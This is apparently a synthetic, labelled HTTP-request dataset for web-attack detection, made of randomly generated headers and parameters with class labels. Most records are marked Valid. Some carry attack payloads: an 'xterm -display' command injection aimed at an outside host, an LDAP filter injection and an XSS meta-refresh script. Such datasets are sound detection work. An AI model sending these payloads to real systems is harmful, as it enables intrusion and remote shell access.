3sWhavingTp=gUv2wpTs&hwgjule=hr26deftpscript&plhixLnsgTh4sd=4.720okZ&4lepmee=nmpen5ie8N&2aeoTmlE4gwe=0603996

End - Id: 6416
Start - Id: 4916
class: Valid
PUT /DkVoLtvx/qrosowoSeoufssstlzfi/6o_2h5@jm2/ijWtKkXzvqco8VM/tblCk@/dl5etesnwioxetqirs/oi4PN4MnGE5gF/orAigc29c0rqh.dll? HTTP/1.0
Content-Length: 66
Content-Language: temdtt9e
Content-Encoding: identity
Content-Location: /eferdUl/jn4ldiL/seKyei.fgf
Content-MD5: aW5zc3czeW5zNG1pbnRkUw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 04 Apr 07 23:07:26 GMT
Last-Modified: Thu, 15 Apr 04 10:14:06 CET
Host: www.fadeHeEtO.ch:73
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 47.100.65.174
Cookie: qEgohee=ac;6b=qa1delete7;hqL42inpImkiq=Tu nt;Hsdc=41488;niaysoiidtoulwc=9802995984;qldT29tqmr=3tdlIRtIejsrh5rfet
Cookie2: $Version="52"
Date: Sat, 29 Dec 07 24:27:35 CET
ETag: W/"oz7H7O1v7SSfqgo7H@R8"
Expect: 100-continue
From: osuu@ioeO.org
If-Modified-Since: Wed, 10 Oct 07 20:23:54 GMT
If-Unmodified-Since: Sat, 03 Apr 04 09:15:27 CET
If-Match: "pL3bVlIT088K-eSgxin"
If-None-Match: "LBSu2UMxN1Q8oo4RxX"
If-Range: Wed, 24 Feb 10 11:58:49 GMT
Max-Forwards: 6572
MIME-Version: 8.8
Pragma: es=4uT
Proxy-Authorization: Digest nc=eFb2E0C2
Authorization: Basic ZW5lamU0YTprdHg1czU=
Range: 0401-,-401,485260-5
Referer: http://oATozzn.com/riko34.tar
TE: chunked;q=0.9
Trailer: Accept-Encoding
User-Agent: ntey/2.4.7
UA-CPU: x86
UA-Disp: 979,352,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 5493x774
Via: tEipa/8.7 www.f2tp51n.gif, rOekR/3.9 175.107.42.72:16281, 6.5 www.IoaglisE.tiff:67
Transfer-Encoding: cean
Upgrade: dnb/4.0
Warning: 222 www.oeeeay.gif:8841 "nriml4ld" "Mon, 28 Aug 06 16:14:52 GMT"
X-Forwarded-For: 120.74.168.159
X-Serial-Number: 074898
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

mR=a0oDd&acttei29e=yres2nw9yrua4n3te8&Mv0mmailhPC=9dh4koc55aokRcnt

End - Id: 4916
Start - Id: 6787
class: Valid
POST /Aaee/sSYRtxlTr1cjg6w/o6vDkJH.tM@ssngt@YMv/Detc0d1ihg2z2i@E7h/rkDz3Sjv1NY/bfbOypQVkNHm/zguYahkJBRBh5fBOI2zJ/evalg.bin? HTTP/1.1
Content-Length: 244
Content-Language: thvEtA1
Content-Encoding: identity
Content-Location: /iir7csP.jsp
Content-MD5: ZHJ3bmxjdmxiZmluMmRxdA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 02 Feb 09 15:46:33 GMT
Last-Modified: Mon, 25 Aug 08 09:18:19 GMT
Host: 82.190.182.209:80
Connection: keep-alive
Accept: image/gif;q=0.4
Accept-Charset: x-mac-korean;q=0.8
Accept-Encoding: 
Accept-Language: ga-i6, yv9eaur5-isuotlA, kt-rhRE, 7-04enynio
Cache-Control: iaf3f=agnAezEn
Client-ip: 181.153.33.99
Cookie: 2iw1GS=hC7gcRKUq;muere=)uthlshy;4?;b12oekornpie= nOphp5g:(ze sooedn:
Cookie2: $Version="6"
Date: Mon, 20 Apr 09 02:07:53 GMT
ETag: W/"95Ig-WIGv8SkessGXoD2"
Expect: 100-continue
From: ooti@eeee.gov
If-Modified-Since: Tue, 23 Dec 08 10:27:33 UTC
If-Unmodified-Since: Mon, 09 Nov 09 04:26:57 UTC
If-Match: *
If-None-Match: "fLZ3wdECIY-0PcH2"
If-Range: "U8ZCDzCvBM0rVrLxGch"
Max-Forwards: 151
MIME-Version: 8.7
Pragma: hkP='h'
Proxy-Authorization: 3ptg ojj0e=tta6i
Authorization: Basic YXI0YTowdHllb3Jh
Range: -8361
Referer: /nlts/aximdb/uolicA/er4fio.swf
TE: trailers,gzip;q=0.8
Trailer: Expect
User-Agent: Mozilla/9.1 (Windows; U; Windows NT 8.1; wf-rs; rv:0.4.7) Gecko/48136599
UA-CPU: 68000
UA-Disp: 610,0382,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 037x6645
Via: kEE/9.3 www.teIor.png, 5.9 www.t579aa.js:58
Transfer-Encoding: identity
Upgrade: 8tEuth/3.6, 0ndlte/6.2, lnc/7.9, e08/7.6
Warning: 897 www.4b8xdAal.jpeg "SHkbAvLcoafh" "Thu, 20 Aug 09 03:54:13 UTC"
X-Forwarded-For: 140.71.84.57
X-Serial-Number: 818589640847285
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

KLMmR9d.4V=sFenhslfdl8&ihpnudq=t@tShoorater&e6ew=wa(&wRotwE5obidtana=r?ata&o17c7FfcopyZ350=639339119&3v=eTe&hlgttheaehE=1iaaiR&dryldnaa=aj&ltvoueelqaCIqeF=sNgtWczY93&gtVb0smtp=hw o&etni2bd7neb=57&ehgnwpdyoseqii=t~le/ylio0>BosnCmA\

End - Id: 6787
Start - Id: 43157
class: OsCommanding
GET /nod0imd4tbdol/rnlwuUyigect5en/fromxfS/eEa2gfUbLZT2xhst.aspx?2Lho3i=tilhend&nseEekanrs7=%250Axterm+-display+www.llerstnt.com%3A0.0+ HTTP/1.1
Host: 96.46.74.0
Connection: close
Accept: image/*
Accept-Charset: windows-1257, iso-8859-7, x-mac-icelandic;q=0.4, iso-8859-8;q=0.9
Accept-Encoding: gzip;q=0.0, identity
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 66.158.131.150
Cookie: ZgH15j3d=wOo
Cookie2: $Version="36"
Date: Mon, 15 Nov 04 21:12:35 GMT
ETag: "8Si792-o4C3zcdKh6"
Expect: 100-continue
From: riAeyrh@tgaMea.st
If-Modified-Since: Fri, 06 Apr 07 16:04:23 UTC
If-Unmodified-Since: Sat, 02 Jul 05 05:47:30 UTC
If-Match: "UOflgWQ3He.Mn2-krRv9"
If-None-Match: "UoQL0QEGsw-9tk4lG"
If-Range: Fri, 04 May 07 05:47:31 UTC
Max-Forwards: 0
MIME-Version: 1.6
Pragma: dt='6ol'
Proxy-Authorization: 4lhm thmdu=aoeoa
Authorization: Basic RGVvcGpnNjpkb3RpT0hl
Range: 46359-,93372-15,76-
Referer: http://www.7rthh.de/ueiwa/2ec9ves/dTsi/oentne.html
TE: trailers
Trailer: If-Match
User-Agent: Uws7/8.8.6.1
UA-CPU: Sparc
UA-Disp: 309,0830,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 807x674
Via: sorse/2.7 www.heeeEi.shtml
Transfer-Encoding: deflate
Upgrade: sPlrA/2.7, nth/6.0, S4hn/1.6, eStqn/4.6, aarg/7.7
Warning: 027 www.snsA.shtml "dncghr1daAmsfa" 
X-Forwarded-For: 9.181.32.5
X-Serial-Number: 97812200258960530552
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43157
Start - Id: 38971
class: LdapInjection
GET /bnxaSi_TMz7q4u8t/1tSUV-vh9zxRSC/wW2lojk0n0brEsEPXIVF/d_I/ywnaM./enh/lnqjk.T-xmlQR0/sf7ojN5S0GzFa7p/oaDUtvrwN.png?rAoeez3otai=eT076%401DVskr&sqia=aFo6ONoB&adtbet4=rhuoI%29%28%26%28objectClass+%3D+tuo*%29 HTTP/1.1
Host: 26.238.130.83
Connection: stdqth5o
Accept: audio/*;q=0.8, image/jpeg
Accept-Encoding: *
Date: Wed, 04 Jan 06 18:14:09 CET
If-Match: "Whtl8p8BnQEz5VZBxEwZ"
Pragma: no-cache
Authorization: NTLM c2VzcGViZWRscmllaWdiZW1hZ2R6cmdpc2VrZHR3c25lbm5ucmFp
Referer: /wyv2Edn/o79f2/eHthioee/9sIsehok.nsf
User-Agent: lmeryggs/2.6.0.8.6
Via: dis/0.0 195.217.62.241

null

End - Id: 38971
Start - Id: 47696
class: XSS
GET /ieel/gSCA1qd9am11/raix/uHpGdJFhvdG/QMNiv0VVtUprocessing-instructionx/fu/u4/tioI.jpg?2I0-B-qSkx=%3Cmeta+++http-equiv+++%3D+%22++++refresh+++++%22++++content%3D++++%22++++0%3Burl%3Djavascript%3A+++%5Balert+++%28%27scetiglz%27%29%3B%5D+++++%22%3E&cetEtpgabL=slh6union&ymtnete07aloii8=w HTTP/1.0
Host: www.Fsrn.org:71
Connection: t3oguaRc
Accept: video/quicktime;q=0.2
Accept-Charset: windows-1257, iso-8859-7
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale=25
Client-ip: 29.159.169.244
Cookie: we3eoe2raectd=4
Cookie2: $Version="01"
Date: Thu, 20 Sep 07 17:56:43 UTC
ETag: "eymgqpKzdWID58x"
Expect: 100-continue
From: ntca1@4fmcsegl.gov
If-Modified-Since: Fri, 27 Nov 09 14:41:42 GMT
If-Unmodified-Since: Sun, 08 May 05 02:15:13 GMT
If-Match: "mTx35NdR4gl6h3AkUb_3"
If-None-Match: "M-x-LJ3xBIQnHF_4OH"
If-Range: *
Max-Forwards: 55
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: sxorov avcea=rose
Authorization: Sbiehe HEspk6tt=6cgxq
Range: 834-
Referer: http://hreuiiec.de/hhlxsha/ericuq/Intgdre.sh
TE: trailers,trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/3.6 (X11; U; Solaris 2.6; lf-su; rv:3.5.7) Gecko/87855526
UA-CPU: 68000
UA-Disp: 0445,5858,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 5167x472
Via: 2.7 4.71.32.4, HTTP/4.6 119.189.227.71, is4op/9.4 www.igdH.css
Transfer-Encoding: eo6rT; aceaAthf=wueou9
Upgrade: 4Siht/2.2
Warning: 422 www.tsahzte.tiff "ndnheiEmueo" "Fri, 27 Jan 06 13:37:13 GMT"
X-Forwarded-For: 218.241.223.131
X-Serial-Number: 6943669939
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47696
Start - Id: 6837
class: Valid
PUT /aZf6IvY3JYLff5juc/med1rgep78.gif? HTTP/1.0
Content-Length: 137
Content-Language: tnbgd
Content-Encoding: compress
Content-Location: http://www.tdnt.cz/hmnie.css
Content-MD5: bXRyZWVhZWhubDdzN29zZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 27 Dec 09 20:41:18 CET
Last-Modified: Wed, 01 Mar 06 19:42:13 UTC
Host: 17.51.12.144
Connection: keep-alive
Accept: video/quicktime, application/postscript;q=0.3, text/*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: t-IhoeOj;q=0.0, eiataTi-ter;q=0.6, e8maa-rnrrdn, rbnsrit-zguoB;q=0.7
Cache-Control: min-fresh=83
Client-ip: 133.77.123.5
Cookie: 20ia=v$;pAyTdmme8=a h g;ae7at0odfrll=t$;CkGLcopyallGhQM1=uyebawoldatr;mncy3t=c2Jr787C;I-binMACNmknEO=ak
Cookie2: $Version="6"
Date: Tue, 20 Apr 04 21:13:22 GMT
ETag: "gEp5UJJk2-.LHHm"
Expect: 100-continue
From: dbae4ti@tmraxarsak.gov
If-Modified-Since: Sun, 23 Jul 06 15:08:51 GMT
If-Unmodified-Since: Sun, 14 Jan 07 19:40:08 UTC
If-Match: "edOroc9F8uI1p86"
If-None-Match: *
If-Range: *
Max-Forwards: 8
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: Basic dG9hZm9vcm46aW9yRWJwdXk=
Authorization: Digest realm
Range: 708-,54-
Referer: http://adsosvT.de/7nW7oi/aert/fyErttu4/0or8caVe.php4
TE: chunked
Trailer: Trailer
User-Agent: eo3IXSm3gI http://www.nteeWmn.com
UA-CPU: 68000
UA-Disp: 469,437,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 302x0187
Via: FTP/0.9 www.sve3eht.png:475
Transfer-Encoding: compress
Upgrade: adhoe/1.9, tFp/6.3, Sodh/1.5, htccnv/7.0, Teeeqf/9.6
Warning: 649 203.53.186.124 "goDwmmazMte" "Fri, 23 Sep 05 06:11:33 UTC"
X-Forwarded-For: 140.71.84.57
X-Serial-Number: 476384803
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~

s6=bvU91DnERuS&562homeI75EBdE=1yopt&PlTwlogaQtHkp=cotqp0xu&UVKhe=+&whuoaefreuhe6=3737179&6Nyaaoshht1i3=/%sonode&Lrcorewrql2=3301351

End - Id: 6837
Start - Id: 6739
class: Valid
PUT /eoime9qb1ann/atlmeh/r4elathoouTB/pGy/e1SOJxU_v/snEloldahfehuen5seoo/kSStvZGwQv@uq6I1m.swf? HTTP/1.0
Content-Length: 98
Content-Language: tse1,uroihd,Nshw
Content-Encoding: identity
Content-Location: http://www.r7sth.it/xdsNa/shni/jpjY5vm4/eanwltpy/si5diiom.zip
Content-MD5: dXIyZXlhY25pZmlkSGRhaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 19 Jul 05 06:31:56 UTC
Last-Modified: Mon, 24 Mar 08 06:53:02 CET
Host: 91.205.158.2
Connection: jAitz
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 3.85.232.163
Cookie: K@921WbXZ8d=641093109;cmgioaois=06685217;bmsnsr4tsPexbe6=ace=e1ormt/iframen;0tPm=8kUD_AHBkmr6;2iVhbo.1_WF=4;tdsnesxeexldb=8055
Cookie2: $Version="87"
Date: Thu, 28 Dec 06 23:33:34 GMT
ETag: W/"47QAu0uB2I2rgLYT56rI"
Expect: hete
From: yhiii@asou.ch
If-Modified-Since: Fri, 13 Jun 08 08:49:01 GMT
If-Unmodified-Since: Sun, 05 Nov 06 12:07:29 UTC
If-Match: *
If-None-Match: "ZeuEgAKxg0lKFlPz@"
If-Range: "h9tXt2ca7VzB68Z"
Max-Forwards: 697
MIME-Version: 5.9
Pragma: wghu='aO'
Proxy-Authorization: NTLM b2E1dGl1eEhzY2o2ZWFkZWxoZTVzdHdvZThlbmFzQmZEcFVydg==
Authorization: Digest realm
Range: -857816
Referer: /wehgal/mgrAo/oaye34.asmx
TE: deflate,trailers
Trailer: Referer
User-Agent: twheshf/1.1.4
UA-CPU: Sparc
UA-Disp: 053,477,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 133x848
Via: HTTP/6.2 35.130.78.154, 5.0 37.22.126.143:65
Transfer-Encoding: compress
Upgrade: uEWpe7/8.0, areh/1.5, 0udeep/0.1
Warning: 366 171.36.127.196 "totegellhyswl3loi" 
X-Forwarded-For: 191.106.203.155
X-Serial-Number: 377808112519787553
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~

kaemsiceco=hmf1iAhg327af7&aonermwhorne=42563117&ovegwj3slio=61129525&uteshhmhie=cPvhiW&da=96316656

End - Id: 6739
Start - Id: 34275
class: Valid
PUT /oo8lbQ1b@/rjMhGpdJg1uNt/la3qyye6U/tA9hiiehniujy/1imgicdr9ebn0n/cvJJ@aSkiRqm8uc/eTqxethsio9tettfsvem/2@c0/sJXejgSAI8.pl? HTTP/1.0
Content-Length: 319
Content-Language: rrnOrfsa,s1ckam
Content-Encoding: deflate
Content-Location: http://www.tcdbeptr.fr/0aey6sb/nuosi.js
Content-MD5: bGEyYURlYzU3aWFlbG5tdA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 19 Apr 07 09:10:32 UTC
Last-Modified: Wed, 20 Aug 08 02:05:29 GMT
Host: www.nimso3P.uk
Connection: close
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: min-fresh=8
Client-ip: 89.182.100.174
Cookie: epdeo67bthgr=itt;aS7xo=ueibrvt3i1rae3nsdk;oahn4ehasc=0;bnSt1mqHettyueh=ltsoaducedf0oeVr;vdwie=t:7re7&oth7cij
Cookie2: $Version="236"
Date: Mon, 05 Jan 04 02:14:57 CET
ETag: W/"pmTNHPYgCSciJwXH"
Expect: 100-continue
From: fqlzuns@M5Alne.ch
If-Modified-Since: Fri, 28 Jul 06 24:14:10 CET
If-Unmodified-Since: Fri, 17 Jul 09 14:03:07 GMT
If-Match: "INAcVBYM-01QWM6q"
If-None-Match: *
If-Range: "iv7Mcy_Grl@xRrQZ"
Max-Forwards: 1
MIME-Version: 6.1
Pragma: ezP=chesmi
Proxy-Authorization: NTLM c2k3QXN0dHNVa2FhM3hhZWlydGhjb3FOZWl1c2JjbmFp
Authorization: Rlhwo9 iANp=iabt
Range: -0,7377-6
Referer: /s8etxlel/sjin7n/ansS5lA6.dll
TE: trailers,trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/7.9 (X11; U; Open BSD i586 3.2; 6a-ec; rv:4.3.3) Gecko/54105208
UA-CPU: 68000
UA-Disp: 693,674,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 1417x508
Via: 8.7 18.107.221.114, 3.7 www.g8cgwn.html
Transfer-Encoding: snts
Upgrade: onuaa/7.8, tZmef/6.9, uhou/2.5, grup6/7.0
Warning: 445 www.dRtgo.jpeg "eeTzgb" 
X-Forwarded-For: 60.98.250.76
X-Serial-Number: 437295181628210
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

st=snaw0&dekoS8k62dgwno=reueabjad~Rh&sofbemh=o8yESte  r>&x5sBQ1lJahtpass=IscIersn6mdedvfd&gtsE22cHeir0i5=sPZss&vngtedeeees=ivn&atd=ednhexec4jechohrh:&HiaztqwAt=23&initoe=07423015&ssSin=hexecai$rla\turv EsTe&SV0nph-=0AeTi2dciuehsrt&QandtlHtmpya00JI=nd8editwOe9g3sjpsf&id=tkdyabaoa&lnrDo=ilogus&Ovtgb=1297548913

End - Id: 34275
Start - Id: 28463
class: Valid
GET /m6mAiRdeleteLC.urGtB/4J_MlSox4lyHEfB/.CAIYVCDgroup by5/eGLoS.-S/67w0REe/mhOcdhPrNhw7c.jpg?ixTEooletano3=627114&ayg5Fadido=rem&altl=eirkhin&tfRl=155&Gs=sisdol6tn&1ZDj1mTOdeleteBbodyC=naccess_logon+belg%24replacehE0insert4oboot.ini&unhtvoeto5A=%3B+&kHositeisaah=92&PuftSKF=13914&eshwdm=nnull&ichrdyvtadb7urj=pah5pnint&lomdniee=i HTTP/1.1
Host: www.relh.fr:80
Connection: keep-alive
Accept: application/*;q=0.8
Accept-Charset: gb2312;q=0.2
Accept-Encoding: compress;q=0.1, compress;q=0.9, deflate
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 180.149.85.5
Cookie: ttPElrepwi67=47755594;a-m4C7HlIltF=911078
Cookie2: $Version="0"
Date: Thu, 27 May 04 19:47:16 CET
ETag: W/"nZA0VNSrgLMY5KPkMC3v"
Expect: qcxaiLx
From: 2I44wld@ncaeozbEs.gov
If-Modified-Since: Sun, 28 Feb 10 24:09:06 UTC
If-Unmodified-Since: Tue, 06 Jun 06 07:58:09 UTC
If-Match: *
If-None-Match: "FXt6TWYJnda3.PvXa"
If-Range: *
Max-Forwards: 643
MIME-Version: 0.3
Pragma: m='Eheedrr'
Proxy-Authorization: ieaahi nGwal=0Segtea
Authorization: Digest response="5c759dB145Bc55ce5dD8Ef0F3462daCB"
Range: 51205-,399-
Referer: http://www.hllRwdn.net/yhlelF/39le/eehe.asp
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: dtDzId http://www.Aee7e2.biz
UA-CPU: 68000
UA-Disp: 0681,480,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 2738x559
Via: 4.4 127.244.45.251:79, 4.3 202.150.245.130, 3.5 www.senRy.css
Transfer-Encoding: compress
Upgrade: rsc/6.4, MAieh/2.6, olg/0.2
Warning: 717 213.77.249.79 "ztr6oRnm" 
X-Forwarded-For: 7.240.245.49
X-Serial-Number: 623138
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28463
Start - Id: 28460
class: Valid
GET /gZ3LSnYsqlEpSf.mdb?sainlRtaoaleir=dtorr&rnnarm=5256968468&ii7h6h5lw=bXa3m.-9T1&czHhth=qvxgbb.OegV&8mofelo=ems1gsfinmAacNiE&1stseahh=63&3aeKtiiasohu=4nym%2F&hiphNuaz28nl=no%2Bee%7C%7Eytmpltrv%5B&tewat=aaathotocfkl4 HTTP/1.0
Host: www.bnOgaruind.ch
Connection: keep-alive
Accept: audio/*;q=0.4, text/html, application/x-tar;q=0.9
Accept-Charset: macintosh
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 164.210.23.83
Cookie: ttPElrepwi67=47755594;a-m4C7HlIltF=911078
Cookie2: $Version="855"
Date: Tue, 05 Apr 05 02:09:20 UTC
ETag: "4ohLRNGxY-E4_hL"
Expect: faeedy
From: 3teotee@motpa.ch
If-Modified-Since: Sun, 28 Feb 10 24:09:06 UTC
If-Unmodified-Since: Sun, 04 Jun 06 24:21:55 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3037
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: ieaahi nGwal=0Segtea
Authorization: annA fa7phs1=bqnEvtoe
Range: 51205-,399-
Referer: http://tgwwad.cz/tjS7dnaN/yhnw6Nt.mdb
TE: deflate;q=0.0,chunked;q=0.4,trailers
Trailer: If-Unmodified-Since
User-Agent: 958tgeelbt
UA-CPU: 68000
UA-Disp: 0681,480,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 2738x559
Via: 8.1 158.64.117.118, 3.8 www.meeglwm.jpg
Transfer-Encoding: deflate
Upgrade: rsc/6.4, MAieh/2.6, olg/0.2
Warning: 966 101.43.142.203 "tcetitxnsoj" "Tue, 14 Oct 08 17:34:51 UTC"
X-Forwarded-For: 84.7.158.77
X-Serial-Number: 623138
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28460
Start - Id: 17203
class: Valid
GET /arAc6tottmiawnaNi/5aaHgoinltehiw/aiiucplaKu8h2s8/ir2qlorsli.exe?ej2ub=bcn5iridn5aw HTTP/1.1
Host: www.iEcihaa1sa.biz
Connection: close
Accept: image/jpeg, image/*;q=0.9, image/jpeg;q=0.1
Accept-Charset: iso-8859-1;q=0.3, windows-1258;q=0.0, iso-8859-4;q=0.9, x-mac-hebrew;q=0.7
Accept-Encoding: identity, gzip, gzip;q=0.4
Accept-Language: *
Cache-Control: no-cache
Client-ip: 106.60.218.207
Cookie: YpZw-g=26;iH3tnurhyF=0 a;ftnoenyvmah7mH=037;7pSZem=lo Ehifxp_mrh/on7Bs;1ezpoafey=uwJZFLZ;csg=8794
Cookie2: $Version="62"
Date: Sun, 21 Nov 04 20:04:12 GMT
ETag: "luwC8vJmsCbp7EYXytg"
Expect: n8ppa
From: esabrd@aecmV.uk
If-Modified-Since: Sat, 27 Oct 07 05:39:18 UTC
If-Unmodified-Since: Fri, 18 Jun 04 24:02:42 CET
If-Match: "EnkZewFT08IBemf"
If-None-Match: *
If-Range: "-VpQ1PzWeyX0zHr9qAF"
Max-Forwards: 53
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: dRini wnbheet=snah
Authorization: dbrep hi5aie=ghlevaln
Range: 0678-
Referer: /neoos/ttDsarhw/9dythenb/clrNuff.jpeg
TE: chunked,gzip
Trailer: Max-Forwards
User-Agent: k1xN8Xex http://www.nvaddgt.org
UA-CPU: PowerPC
UA-Disp: 150,488,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 987x645
Via: FTP/3.8 www.tsdW.js:58549, FTP/3.7 38.241.22.200
Transfer-Encoding: compress
Upgrade: huleor/1.9
Warning: 652 172.163.128.242:14057 "meiaHl" 
X-Forwarded-For: 84.87.70.49
X-Serial-Number: 80895113
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17203
Start - Id: 15818
class: Valid
GET /pnaiudi5C/X.77QBC94@RvQk/6uqaasngahktetthTd5/a4emo/uFqUwAatT.html?clipmtetiai5Na=apmcz%40VTEqXf&nNEx1SHU=so HTTP/1.0
Host: www.jtnea8.be:32211
Connection: 1filgs2r
Accept: video/*, image/*;q=0.5, image/*
Accept-Charset: koi8-r;q=0.9, shift_jis
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 17.195.226.197
Cookie: nvetekTase=non?;Yya6stdinVM8=3101129;2metarPaGz8R2n=aCks
Cookie2: $Version="2"
Date: Mon, 18 Apr 05 12:28:21 UTC
ETag: W/"4g.i8cxBwn8B1MSmy"
Expect: 100-continue
From: nsmr@ahaei.uk
If-Modified-Since: Thu, 24 Apr 08 18:04:01 GMT
If-Unmodified-Since: Sat, 08 Aug 09 13:47:58 GMT
If-Match: *
If-None-Match: "2iHoNkTPjP4-Ga.UEwo1"
If-Range: Fri, 03 Oct 08 02:38:01 GMT
Max-Forwards: 58
MIME-Version: 4.5
Pragma: 9='5h1l'
Proxy-Authorization: Digest username="0nSl"
Authorization: Digest qop=yMwzne
Range: -63889,815-78,-958
Referer: /t4dt/ueie/zheD.tar.gz
TE: trailers,trailers
Trailer: Date
User-Agent: Mozilla/0.6 (X11; U; Unix 4.7; to-se; rv:1.7.9) Gecko/13248615
UA-CPU: StrongARM
UA-Disp: 3222,4414,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 132x8371
Via: HTTP/1.5 188.254.126.146:142, 3.3 www.hrwu.png
Transfer-Encoding: compress
Upgrade: tnsap/4.9, hb3i/7.3, teoa/7.0, yetn/8.3, dof/3.7
Warning: 193 www.losl.png "jmxogwrexo6" 
X-Forwarded-For: 10.118.64.124
X-Serial-Number: 6066558353005235
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15818
Start - Id: 15278
class: Valid
GET /Lzk.jpg? HTTP/1.0
Host: www.ibltrla3n.fr
Connection: keep-alive
Accept: video/quicktime;q=0.0
Accept-Charset: windows-1257, iso-2022-jp, euc-cn;q=0.6, x-mac-cyrillic;q=0.7, iso-10646-ucs-2
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: no-transform
Client-ip: 0.136.238.190
Cookie: Sneuvit7o4ahln=55857205;rotuehaamtmrpmv=a0a ;yg6luma=dHHa;ei=rh;ye=sktuXCeD;oE0bOp6vedwsr=nnrehaest
Cookie2: $Version="4"
Date: Tue, 16 Feb 10 10:10:56 CET
ETag: "vT9xqkIghaOWZ3nq.oJ."
Expect: 100-continue
From: etcE6a@toassttIou.de
If-Modified-Since: Sun, 09 Jul 06 20:02:45 GMT
If-Unmodified-Since: Mon, 06 Oct 08 18:04:28 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 08 Oct 04 04:14:50 UTC
Max-Forwards: 5
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: NTLM NzR0cHRzYWRlZUFFeWFvSHhoc1FiWGRub3g1dHRsdDBlRHVuYTJpbm5uZmR0aA==
Range: -425
Referer: http://www.zAaGft.cz/sloltwb/svhenjr/ajed/Lweetmr/ipemoeo.swf
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/2.2 (Windows; U; WinNT 6.0; 2o-sf; rv:4.0.7) Gecko/70273713
UA-CPU: StrongARM
UA-Disp: 8576,0816,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 9424x098
Via: 6.9 www.heutnd.shtml, 9.3 154.82.172.196:0, 6.4 110.241.43.202
Transfer-Encoding: noss; aosdb=r9q1e
Upgrade: hfypo3/8.4, oeoo/3.1, IskcE/6.7, mdredh/7.9, fmaid/9.9
Warning: 995 172.185.188.148 "OcSZC" "Sat, 30 Jul 05 15:15:26 UTC"
X-Forwarded-For: 186.177.123.173
X-Serial-Number: 193733514519780157
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15278
Start - Id: 28166
class: Valid
GET /hs6i@jreOx/uenhti6sjrst/dBn1OmmGivnU.exe?0tmpOlzprocessing-instructionK=mZKVDn&esatboilv=4583883&tte7pEdea=aqqs2&ia=ehD1ain&ai=sraDLZ5JX&ote=75&qsi8Snsdiuxg=81529&ai8e=ln6&mfdnfeych=L HTTP/1.1
Host: 133.53.90.179:2
Connection: hgteTeza
Accept: application/rtf
Accept-Charset: x-mac-cyrillic, cp-932;q=0.2
Accept-Encoding: *
Accept-Language: fstT-osred, wypy9d-aytgtte;q=0.1, aleeO-4ifotsaa;q=0.9, 7rcvalei-e
Cache-Control: inp='i3baTrnr'
Client-ip: 221.141.132.92
Cookie: dbDhgl=fetpsauhrn 4jDa;8piinee=Gee7isbslexo/O 
Cookie2: $Version="8"
Date: Sun, 11 May 08 09:02:18 CET
ETag: W/"84ZOuaPFMqUHceiIHjs"
Expect: cmGhof4A=ehaaa;godae
From: 5sno9a@sllb.be
If-Modified-Since: Tue, 19 Oct 04 23:24:20 CET
If-Unmodified-Since: Fri, 21 Aug 09 21:49:22 GMT
If-Match: *
If-None-Match: *
If-Range: "KPCoRdW8EbfbqpJsi"
Max-Forwards: 2
